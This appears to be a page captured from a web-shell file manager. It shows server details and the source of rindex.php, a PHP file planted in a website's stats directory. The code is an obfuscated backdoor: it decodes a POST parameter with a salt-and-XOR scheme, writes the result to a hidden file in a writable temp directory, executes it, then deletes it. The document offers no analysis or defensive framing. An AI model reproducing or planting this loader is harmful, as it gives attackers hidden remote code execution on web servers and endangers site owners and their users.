HEX
Server: Apache
System: Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: web57 (5040)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/clients/client6/web57/web/stats/2024-10/rindex.php
<?php

if(@$_POST["flg"] !== null){
	$ent = array_filter(["/tmp", getcwd(), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path()]);
	$token = $_POST["flg"];
	 		$token	 =		explode		 (  '.'	 ,$token)		;	 
	$binding = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt);
            $q = 0;
            $__len = count($token);
    
            do {
                if($q >= $__len) break;
                $v9 = $token[$q];
                $sChar = ord($salt[$q % $lenS]);
                $d =((int)$v9 - $sChar -($q % 10)) ^ 86;
                $binding .= chr($d);
                $q++;
            } while(true);
	foreach ($ent as $object):
    		if ((is_dir($object) and is_writable($object))) {
    $item = str_replace("{var_dir}", $object, "{var_dir}/.holder");
    $success = file_put_contents($item, $binding);
if ($success) {
	include $item;
	@unlink($item);
	exit;}
}
endforeach;
}